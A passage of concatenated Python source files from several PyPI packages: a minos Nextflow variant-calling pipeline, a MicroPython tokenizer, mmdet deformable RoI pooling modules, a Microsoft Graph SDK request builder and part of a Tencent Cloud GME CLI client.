variants_per_split = ${params.variants_per_split} if ${params.variants_per_split} > 0 else None
alleles_per_split = ${params.alleles_per_split} if ${params.alleles_per_split} > 0 else None
print("total_splits", total_splits)
print("variants_per_split", variants_per_split)
print("alleles_per_split", alleles_per_split)
if total_splits is None and variants_per_split is None and alleles_per_split is None:
gramtools.run_gramtools_build(
"gramtools.build_dir",
"small_vars_clustered.vcf",
"${params.ref_fasta}",
max_read_length,
kmer_size=${params.gramtools_kmer_size},
)
else:
chunker = vcf_chunker.VcfChunker(
"gramtools.build_dir",
vcf_infile="small_vars_clustered.vcf",
ref_fasta="${params.ref_fasta}",
variants_per_split=variants_per_split,
alleles_per_split=alleles_per_split,
max_read_length=max_read_length,
total_splits=total_splits,
flank_length=max_read_length,
gramtools_kmer_size=${params.gramtools_kmer_size},
threads=${params.gramtools_build_threads},
)
chunker.make_split_vcf_files()
"""
}
// Parallelised gramtools build. The build chunks go in the same dir as the split VCFs.
// This is required for `minos adjudicate` so that it recognises that the split VCFs and build have already been done.
process gramtools_build_chunks{
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.gramtools_build_small_vars_ram * task.attempt}
maxRetries 3
cpus params.gramtools_build_threads
input:
file vcf_split from gramtools_build_small_vars_vcfs
output:
file("gmtools_build_dir") into gramtools_build_small_vars_out
"""
#!/usr/bin/env python3
import sys,os,shutil
from minos import gramtools
sample_id = "${vcf_split}".split(".")[1]
par_dir = os.path.dirname(os.path.realpath("${vcf_split}"))
build_dir = os.path.join(par_dir,"split.{}.gramtools_build".format(sample_id))
os.symlink(par_dir,"./gmtools_build_dir")
gramtools.run_gramtools_build(build_dir, "${vcf_split}", "${params.ref_fasta}", 150, "${params.gramtools_kmer_size}")
"""
}
// Per-sample minos adjudicate. Each instance of this process runs quasimap/infer on each split and merges the results into one VCF.
process minos_all_small_vars {
errorStrategy {task.attempt < 3 ? 'retry' : 'terminate'}
memory {params.testing ? '0.5 GB' : 1.GB * params.minos_small_vars_ram * task.attempt}
maxRetries 3
input:
file('small_vars_clustered.vcf') from minos_adju_splits
val build_dir from gramtools_build_small_vars_out.collect()
set(val(tsv_fields), file("sample_name.${tsv_fields['sample_id']}")) from minos_all_small_vars_tsv_in
output:
file("small_vars.minos.${tsv_fields['sample_id']}") into minos_all_small_vars_out
"""
sample_name=\$(cat sample_name.${tsv_fields['sample_id']})
minos_outdir=small_vars.minos.${tsv_fields['sample_id']}
minos adjudicate ${use_unmapped_reads} --sample_name \$sample_name --gramtools_build_dir ${build_dir[0]} --reads ${tsv_fields['reads_files'].replaceAll(/ /, " --reads ")} \$minos_outdir ${ref_fasta} "small_vars_clustered.vcf"
"""
}
// This takes the list of per-sample VCFs output by minos_all_small_vars
// and merges them into a multi-sample VCF.
process merge_small_vars_vcfs {
memory '1 GB'
publishDir path: final_outdir, mode: 'move', overwrite: true
input:
val(minos_dir_list) from minos_all_small_vars_out.collect()
output:
file('combined_calls.vcf')
"""
#!/usr/bin/env python3
# Files end with .N (N=0,1,2,3,...) Sort numerically on this N
import os
from minos import multi_sample_pipeline
minos_dir_list = ["${minos_dir_list.join('", "')}"]
tuple_list = []
for filename in minos_dir_list:
fields = filename.rsplit('.', maxsplit=1)
tuple_list.append((int(fields[1]), filename))
tuple_list.sort()
filenames = [os.path.join(x[1], 'debug.calls_with_zero_cov_alleles.vcf') for x in tuple_list]
multi_sample_pipeline.MultiSamplePipeline._merge_vcf_files(filenames, 'combined_calls.vcf')
"""
}
''', file=f)
def _make_output_dir(self):
if os.path.exists(self.output_dir):
if self.force:
shutil.rmtree(self.output_dir)
else:
raise Error('Error! Output directory already exists. ' + self.output_dir)
os.mkdir(self.output_dir)
def _prepare_nextflow_input_files(self):
input_data = MultiSamplePipeline._load_input_data_tsv(self.input_data_tsv)
MultiSamplePipeline._write_nextflow_data_tsv(input_data, self.nextflow_input_tsv)
def run(self):
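        # Descriptive note (not part of the original source): run() creates the
        # output directory and the nextflow input TSV, writes nextflow.run.nf,
        # assembles the nextflow command line, then either prints it (--no_run)
        # or executes it, and finally removes the work directory when clean=True.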
self._make_output_dir()
fh = logging.FileHandler(self.log_file, mode='w')
log = logging.getLogger()
formatter = logging.Formatter('[minos %(asctime)s %(levelname)s] %(message)s', datefmt='%d-%m-%Y %H:%M:%S')
fh.setFormatter(formatter)
log.addHandler(fh)
dependencies.check_and_report_dependencies(programs=['nextflow'])
self._prepare_nextflow_input_files()
original_dir = os.getcwd()
os.chdir(self.output_dir)
nextflow_script = 'nextflow.run.nf'
MultiSamplePipeline._write_nextflow_script(nextflow_script)
logging.info('Prepared nextflow files. cd ' + self.output_dir)
nextflow = dependencies.find_binary('nextflow')
nextflow_command = [
nextflow, 'run',
'-work-dir', self.nextflow_work_dir,
'-with-dag', 'nextflow.out.dag.pdf',
'-with-trace', 'nextflow.out.trace.txt',
]
if self.nextflow_config_file is not None:
nextflow_command.extend(['-c', self.nextflow_config_file])
nextflow_command += [
nextflow_script,
'--ref_fasta', self.ref_fasta,
'--data_in_tsv', self.nextflow_input_tsv,
'--max_alleles_per_cluster', str(self.max_alleles_per_cluster),
'--min_large_ref_length', str(self.min_large_ref_length),
'--final_outdir', self.output_dir,
'--gramtools_max_read_length', str(self.gramtools_max_read_length),
'--cluster_small_vars_ram', str(self.nf_ram_cluster_small_vars),
'--gramtools_build_small_vars_ram', str(self.nf_ram_gramtools_build_small),
'--gramtools_kmer_size', str(self.gramtools_kmer_size),
'--gramtools_build_threads', str(self.gramtools_build_threads),
'--minos_small_vars_ram', str(self.nf_ram_minos_small_vars),
'--merge_small_vars_ram', str(self.nf_ram_merge_small_vars),
]
if self.testing:
nextflow_command.append('--testing')
if self.use_unmapped_reads:
nextflow_command.append('--use_unmapped_reads')
if self.variants_per_split is not None:
nextflow_command.append('--variants_per_split ' + str(self.variants_per_split))
if self.alleles_per_split is not None:
nextflow_command.append('--alleles_per_split ' + str(self.alleles_per_split))
elif self.total_splits is not None:
nextflow_command.append('--total_splits ' + str(self.total_splits))
nextflow_command = ' '.join(nextflow_command)
if self.no_run:
print('Prepared nextflow pipeline. --no_run used, so not running. The nextflow command to run is:')
print(nextflow_command)
return
else:
logging.info('Start running nextflow: ' + nextflow_command)
syscall_process = utils.syscall(nextflow_command)
logging.info('Finish running nextflow. Writing nextflow stdout/stderr to files')
with open('nextflow.stdout', 'w') as f:
print(syscall_process.stdout.rstrip(), file=f)
with open('nextflow.stderr', 'w') as f:
print(syscall_process.stderr.rstrip(), file=f)
logging.info('cd ' + original_dir)
if self.clean:
logging.info('Delete nextflow work directory ' + self.nextflow_work_dir)
shutil.rmtree(self.nextflow_work_dir)
logging.info('Delete .nextflow directory')
shutil.rmtree('.nextflow')
logging.info('Rename .nextflow.log -> nextflow.log')
os.rename('.nextflow.log', 'nextflow.log')
os.chdir(original_dir) | PypiClean |
/pycopy-utokenize-2.0.tar.gz/pycopy-utokenize-2.0/utokenize.py | from token import *
from ucollections import namedtuple
import uio
COMMENT = N_TOKENS + 0
NL = N_TOKENS + 1
ENCODING = N_TOKENS + 2
tok_name[COMMENT] = "COMMENT"
tok_name[NL] = "NL"
tok_name[ENCODING] = "ENCODING"
class TokenInfo(namedtuple("TokenInfo", ("type", "string", "start", "end", "line"))):
def __str__(self):
return "TokenInfo(type=%d (%s), string=%r, startl=%d, line=%r)" % (
self.type, tok_name[self.type], self.string, self.start, self.line
)
def get_indent(l):
for i in range(len(l)):
if l[i] != " " and l[i] != "\t":
return i, l[i:]
def get_str(l, readline):
lineno = 0
s = uio.StringIO()
if l.startswith('"""') or l.startswith("'''"):
sep = l[0:3]
s += sep
l = l[3:]
pos = 0
while True:
i = l.find(sep, pos)
if i >= 0:
if i > 0 and l[i - 1] == "\\":
pos = i + 1
continue
break
s += l
l = readline()
pos = 0
assert l
lineno += 1
s += l[:i + 3]
return s.getvalue(), l[i + 3:], lineno
lbuf = uio.StringIO(l)
sep = lbuf.read(1)
s += sep
while True:
c = lbuf.read(1)
if not c:
break
s += c
if c == "\\":
c = lbuf.read(1)
s += c
if c == "\n":
lbuf = uio.StringIO(readline())
lineno += 1
continue
elif c == sep:
break
return s.getvalue(), lbuf.read(), lineno
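# Usage sketch (illustrative, not part of the original source): like CPython's
# tokenize.generate_tokens(), the generator below takes a readline callable, e.g.
#   buf = uio.StringIO("x = 1\n")
#   for tok in generate_tokens(buf.readline):
#       print(tok)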
def generate_tokens(readline):
indent_stack = [0]
lineno = 0
paren_level = 0
no_newline = False
    # generate_tokens() doesn't yield this, only tokenize() does.
#yield TokenInfo(ENCODING, "utf-8", 0, 0, "")
while True:
l = readline()
lineno += 1
org_l = l
if not l:
break
if not l.endswith("\n"):
l += "\n"
no_newline = True
i, l = get_indent(l)
if l == "\n":
yield TokenInfo(NL, l, lineno, 0, org_l)
continue
elif l == "\x0c\n":
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if paren_level == 0:
if i > indent_stack[-1]:
yield TokenInfo(INDENT, org_l[:i], lineno, 0, org_l)
indent_stack.append(i)
elif i < indent_stack[-1]:
while i != indent_stack[-1]:
yield TokenInfo(DEDENT, "", lineno, 0, org_l)
indent_stack.pop()
while l:
if l[0].isdigit() or (l.startswith(".") and len(l) > 1 and l[1].isdigit()):
seen_dot = False
t = ""
if l.startswith("0x") or l.startswith("0X"):
t = "0x"
l = l[2:]
elif l.startswith("0o") or l.startswith("0O"):
t = "0o"
l = l[2:]
elif l.startswith("0b") or l.startswith("0B"):
t = "0b"
l = l[2:]
while l and (l[0].isdigit() or l[0] == "." or l[0] == "_" or (t.startswith("0x") and l[0] in "ABCDEFabcdef")):
if l[0] == ".":
if seen_dot:
break
seen_dot = True
t += l[0]
l = l[1:]
if l.startswith("e") or l.startswith("E"):
t += l[0]
l = l[1:]
if l[0] in ("+", "-"):
t += l[0]
l = l[1:]
while l and (l[0].isdigit() or l[0] == "_"):
t += l[0]
l = l[1:]
if l.startswith("j"):
t += l[0]
l = l[1:]
yield TokenInfo(NUMBER, t, lineno, 0, org_l)
elif l[0].isalpha() or l.startswith("_") or ord(l[0]) >= 0xaa:
name = ""
while l and (l[0].isalpha() or l[0].isdigit() or l.startswith("_") or ord(l[0]) >= 0xaa):
name += l[0]
l = l[1:]
if (l.startswith('"') or l.startswith("'")) and name in ("b", "r", "rb", "br", "u", "f"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, name + s, lineno, 0, org_l)
lineno += lineno_delta
else:
yield TokenInfo(NAME, name, lineno, 0, org_l)
elif l == "\\\n":
l = readline()
lineno += 1
elif l[0] == "\n":
nl = "" if no_newline else "\n"
if paren_level > 0:
yield TokenInfo(NL, nl, lineno, 0, org_l)
else:
yield TokenInfo(NEWLINE, nl, lineno, 0, org_l)
break
elif l[0].isspace():
l = l[1:]
elif l.startswith('"') or l.startswith("'"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, s, lineno, 0, org_l)
lineno += lineno_delta
elif l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
l = "\n"
else:
for op in (
"**=", "//=", ">>=", "<<=", "+=", "-=", "*=", "/=",
"%=", "@=", "&=", "|=", "^=", "**", "//", "<<", ">>",
"==", "!=", ">=", "<=", "...", "->"
):
if l.startswith(op):
yield TokenInfo(OP, op, lineno, 0, org_l)
l = l[len(op):]
break
else:
yield TokenInfo(OP, l[0], lineno, 0, org_l)
if l[0] in ("(", "[", "{"):
paren_level += 1
elif l[0] in (")", "]", "}"):
paren_level -= 1
l = l[1:]
while indent_stack[-1] > 0:
yield TokenInfo(DEDENT, "", lineno, 0, "")
indent_stack.pop()
yield TokenInfo(ENDMARKER, "", lineno, 0, "") | PypiClean |
/CSUMMDET-1.0.23.tar.gz/CSUMMDET-1.0.23/mmdet/ops/dcn/deform_pool.py | import torch
import torch.nn as nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from . import deform_pool_cuda
class DeformRoIPoolingFunction(Function):
@staticmethod
def forward(ctx,
data,
rois,
offset,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0):
# TODO: support unsquare RoIs
out_h, out_w = _pair(out_size)
assert isinstance(out_h, int) and isinstance(out_w, int)
assert out_h == out_w
out_size = out_h # out_h and out_w must be equal
ctx.spatial_scale = spatial_scale
ctx.out_size = out_size
ctx.out_channels = out_channels
ctx.no_trans = no_trans
ctx.group_size = group_size
ctx.part_size = out_size if part_size is None else part_size
ctx.sample_per_part = sample_per_part
ctx.trans_std = trans_std
assert 0.0 <= ctx.trans_std <= 1.0
if not data.is_cuda:
raise NotImplementedError
n = rois.shape[0]
output = data.new_empty(n, out_channels, out_size, out_size)
output_count = data.new_empty(n, out_channels, out_size, out_size)
deform_pool_cuda.deform_psroi_pooling_cuda_forward(
data, rois, offset, output, output_count, ctx.no_trans,
ctx.spatial_scale, ctx.out_channels, ctx.group_size, ctx.out_size,
ctx.part_size, ctx.sample_per_part, ctx.trans_std)
if data.requires_grad or rois.requires_grad or offset.requires_grad:
ctx.save_for_backward(data, rois, offset)
ctx.output_count = output_count
return output
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
if not grad_output.is_cuda:
raise NotImplementedError
data, rois, offset = ctx.saved_tensors
output_count = ctx.output_count
grad_input = torch.zeros_like(data)
grad_rois = None
grad_offset = torch.zeros_like(offset)
deform_pool_cuda.deform_psroi_pooling_cuda_backward(
grad_output, data, rois, offset, output_count, grad_input,
grad_offset, ctx.no_trans, ctx.spatial_scale, ctx.out_channels,
ctx.group_size, ctx.out_size, ctx.part_size, ctx.sample_per_part,
ctx.trans_std)
return (grad_input, grad_rois, grad_offset, None, None, None, None,
None, None, None, None)
deform_roi_pooling = DeformRoIPoolingFunction.apply
class DeformRoIPooling(nn.Module):
def __init__(self,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0):
super(DeformRoIPooling, self).__init__()
self.spatial_scale = spatial_scale
self.out_size = _pair(out_size)
self.out_channels = out_channels
self.no_trans = no_trans
self.group_size = group_size
self.part_size = out_size if part_size is None else part_size
self.sample_per_part = sample_per_part
self.trans_std = trans_std
def forward(self, data, rois, offset):
if self.no_trans:
offset = data.new_empty(0)
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
class DeformRoIPoolingPack(DeformRoIPooling):
def __init__(self,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0,
num_offset_fcs=3,
deform_fc_channels=1024):
super(DeformRoIPoolingPack,
self).__init__(spatial_scale, out_size, out_channels, no_trans,
group_size, part_size, sample_per_part, trans_std)
self.num_offset_fcs = num_offset_fcs
self.deform_fc_channels = deform_fc_channels
if not no_trans:
seq = []
ic = self.out_size[0] * self.out_size[1] * self.out_channels
for i in range(self.num_offset_fcs):
if i < self.num_offset_fcs - 1:
oc = self.deform_fc_channels
else:
oc = self.out_size[0] * self.out_size[1] * 2
seq.append(nn.Linear(ic, oc))
ic = oc
if i < self.num_offset_fcs - 1:
seq.append(nn.ReLU(inplace=True))
self.offset_fc = nn.Sequential(*seq)
self.offset_fc[-1].weight.data.zero_()
self.offset_fc[-1].bias.data.zero_()
def forward(self, data, rois):
assert data.size(1) == self.out_channels
if self.no_trans:
offset = data.new_empty(0)
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
else:
n = rois.shape[0]
offset = data.new_empty(0)
x = deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels, True,
self.group_size, self.part_size,
self.sample_per_part, self.trans_std)
offset = self.offset_fc(x.view(n, -1))
offset = offset.view(n, 2, self.out_size[0], self.out_size[1])
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
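# Illustrative usage sketch (not part of the original source); the scale, RoI layout
# (batch_idx, x1, y1, x2, y2) and tensor sizes below are assumptions:
#   pool = DeformRoIPoolingPack(spatial_scale=1. / 16, out_size=7,
#                               out_channels=256, no_trans=False).cuda()
#   feats = torch.randn(2, 256, 50, 50).cuda()             # N x C x H x W features
#   rois = torch.tensor([[0., 4., 4., 60., 60.]]).cuda()   # one RoI on image 0
#   out = pool(feats, rois)                                 # -> (1, 256, 7, 7)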
class ModulatedDeformRoIPoolingPack(DeformRoIPooling):
def __init__(self,
spatial_scale,
out_size,
out_channels,
no_trans,
group_size=1,
part_size=None,
sample_per_part=4,
trans_std=.0,
num_offset_fcs=3,
num_mask_fcs=2,
deform_fc_channels=1024):
super(ModulatedDeformRoIPoolingPack,
self).__init__(spatial_scale, out_size, out_channels, no_trans,
group_size, part_size, sample_per_part, trans_std)
self.num_offset_fcs = num_offset_fcs
self.num_mask_fcs = num_mask_fcs
self.deform_fc_channels = deform_fc_channels
if not no_trans:
offset_fc_seq = []
ic = self.out_size[0] * self.out_size[1] * self.out_channels
for i in range(self.num_offset_fcs):
if i < self.num_offset_fcs - 1:
oc = self.deform_fc_channels
else:
oc = self.out_size[0] * self.out_size[1] * 2
offset_fc_seq.append(nn.Linear(ic, oc))
ic = oc
if i < self.num_offset_fcs - 1:
offset_fc_seq.append(nn.ReLU(inplace=True))
self.offset_fc = nn.Sequential(*offset_fc_seq)
self.offset_fc[-1].weight.data.zero_()
self.offset_fc[-1].bias.data.zero_()
mask_fc_seq = []
ic = self.out_size[0] * self.out_size[1] * self.out_channels
for i in range(self.num_mask_fcs):
if i < self.num_mask_fcs - 1:
oc = self.deform_fc_channels
else:
oc = self.out_size[0] * self.out_size[1]
mask_fc_seq.append(nn.Linear(ic, oc))
ic = oc
if i < self.num_mask_fcs - 1:
mask_fc_seq.append(nn.ReLU(inplace=True))
else:
mask_fc_seq.append(nn.Sigmoid())
self.mask_fc = nn.Sequential(*mask_fc_seq)
self.mask_fc[-2].weight.data.zero_()
self.mask_fc[-2].bias.data.zero_()
def forward(self, data, rois):
assert data.size(1) == self.out_channels
if self.no_trans:
offset = data.new_empty(0)
return deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels,
self.no_trans, self.group_size,
self.part_size, self.sample_per_part,
self.trans_std)
else:
n = rois.shape[0]
offset = data.new_empty(0)
x = deform_roi_pooling(data, rois, offset, self.spatial_scale,
self.out_size, self.out_channels, True,
self.group_size, self.part_size,
self.sample_per_part, self.trans_std)
offset = self.offset_fc(x.view(n, -1))
offset = offset.view(n, 2, self.out_size[0], self.out_size[1])
            # The modulation mask scales the deformably pooled features per bin.
            mask = self.mask_fc(x.view(n, -1))
            mask = mask.view(n, 1, self.out_size[0], self.out_size[1])
return deform_roi_pooling(
data, rois, offset, self.spatial_scale, self.out_size,
self.out_channels, self.no_trans, self.group_size,
self.part_size, self.sample_per_part, self.trans_std) * mask | PypiClean |
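A minimal usage sketch for the pooling wrappers above (not part of the original package): it assumes a CUDA-enabled build of the `deform_roi_pooling` extension, that the module defining `ModulatedDeformRoIPoolingPack` is importable, and the usual (batch_index, x1, y1, x2, y2) RoI layout; every concrete shape and value is a placeholder.

import torch
# Placeholder inputs: a 256-channel feature map at stride 16 and two RoIs given
# as (batch_index, x1, y1, x2, y2) in input-image coordinates.
feats = torch.randn(1, 256, 38, 50).cuda()
rois = torch.tensor([[0., 16., 16., 160., 160.],
                     [0., 64., 32., 320., 240.]]).cuda()
pool = ModulatedDeformRoIPoolingPack(spatial_scale=1. / 16,
                                     out_size=(7, 7),
                                     out_channels=256,
                                     no_trans=False).cuda()
out = pool(feats, rois)  # expected shape: (2, 256, 7, 7)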
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/identity_governance/entitlement_management/connected_organizations/item/internal_sponsors/get_user_owned_objects/get_user_owned_objects_request_builder.py | from __future__ import annotations
from dataclasses import dataclass
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.response_handler import ResponseHandler
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from . import get_user_owned_objects_post_request_body
from .......models import directory_object
from .......models.o_data_errors import o_data_error
class GetUserOwnedObjectsRequestBuilder():
"""
Provides operations to call the getUserOwnedObjects method.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new GetUserOwnedObjectsRequestBuilder and sets the default values.
Args:
pathParameters: The raw url or the Url template parameters for the request.
requestAdapter: The request adapter to use to execute the requests.
"""
if path_parameters is None:
raise Exception("path_parameters cannot be undefined")
if request_adapter is None:
raise Exception("request_adapter cannot be undefined")
# Url template to use to build the URL for the current request builder
self.url_template: str = "{+baseurl}/identityGovernance/entitlementManagement/connectedOrganizations/{connectedOrganization%2Did}/internalSponsors/getUserOwnedObjects"
url_tpl_params = get_path_parameters(path_parameters)
self.path_parameters = url_tpl_params
self.request_adapter = request_adapter
async def post(self,body: Optional[get_user_owned_objects_post_request_body.GetUserOwnedObjectsPostRequestBody] = None, request_configuration: Optional[GetUserOwnedObjectsRequestBuilderPostRequestConfiguration] = None) -> Optional[directory_object.DirectoryObject]:
"""
Invoke action getUserOwnedObjects
Args:
body: The request body
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[directory_object.DirectoryObject]
"""
if body is None:
raise Exception("body cannot be undefined")
request_info = self.to_post_request_information(
body, request_configuration
)
from .......models.o_data_errors import o_data_error
error_mapping: Dict[str, ParsableFactory] = {
"4XX": o_data_error.ODataError,
"5XX": o_data_error.ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from .......models import directory_object
return await self.request_adapter.send_async(request_info, directory_object.DirectoryObject, error_mapping)
def to_post_request_information(self,body: Optional[get_user_owned_objects_post_request_body.GetUserOwnedObjectsPostRequestBody] = None, request_configuration: Optional[GetUserOwnedObjectsRequestBuilderPostRequestConfiguration] = None) -> RequestInformation:
"""
Invoke action getUserOwnedObjects
Args:
body: The request body
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
if body is None:
raise Exception("body cannot be undefined")
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.POST
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.add_request_options(request_configuration.options)
request_info.set_content_from_parsable(self.request_adapter, "application/json", body)
return request_info
@dataclass
class GetUserOwnedObjectsRequestBuilderPostRequestConfiguration():
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request headers
headers: Optional[Dict[str, Union[str, List[str]]]] = None
# Request options
options: Optional[List[RequestOption]] = None | PypiClean |
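An illustrative, non-authoritative sketch of driving the generated builder above directly. Only the builder's constructor, its `post` coroutine, and the request-body class are taken from the code above; the already-authenticated kiota `RequestAdapter` (typically obtained from a configured GraphServiceClient) and the connected-organization id are assumptions/placeholders.

from msgraph.generated.identity_governance.entitlement_management.connected_organizations.item.internal_sponsors.get_user_owned_objects.get_user_owned_objects_request_builder import GetUserOwnedObjectsRequestBuilder
from msgraph.generated.identity_governance.entitlement_management.connected_organizations.item.internal_sponsors.get_user_owned_objects.get_user_owned_objects_post_request_body import GetUserOwnedObjectsPostRequestBody

async def sponsors_owned_objects(adapter, connected_org_id: str):
    # 'adapter' is assumed to be an authenticated kiota RequestAdapter.
    builder = GetUserOwnedObjectsRequestBuilder(
        adapter,
        {"connectedOrganization%2Did": connected_org_id},
    )
    body = GetUserOwnedObjectsPostRequestBody()  # optional 'type' filter left unset
    return await builder.post(body=body)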
/tccli-intl-en-3.0.779.1.tar.gz/tccli-intl-en-3.0.779.1/tccli/services/gme/gme_client.py | import os
import sys
import six
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError, ClientError, ParamError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.gme.v20180711 import gme_client as gme_client_v20180711
from tencentcloud.gme.v20180711 import models as models_v20180711
from jmespath import search
import time
def doDescribeAppStatistics(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAppStatisticsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeAppStatistics(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyRecordInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyRecordInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyRecordInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
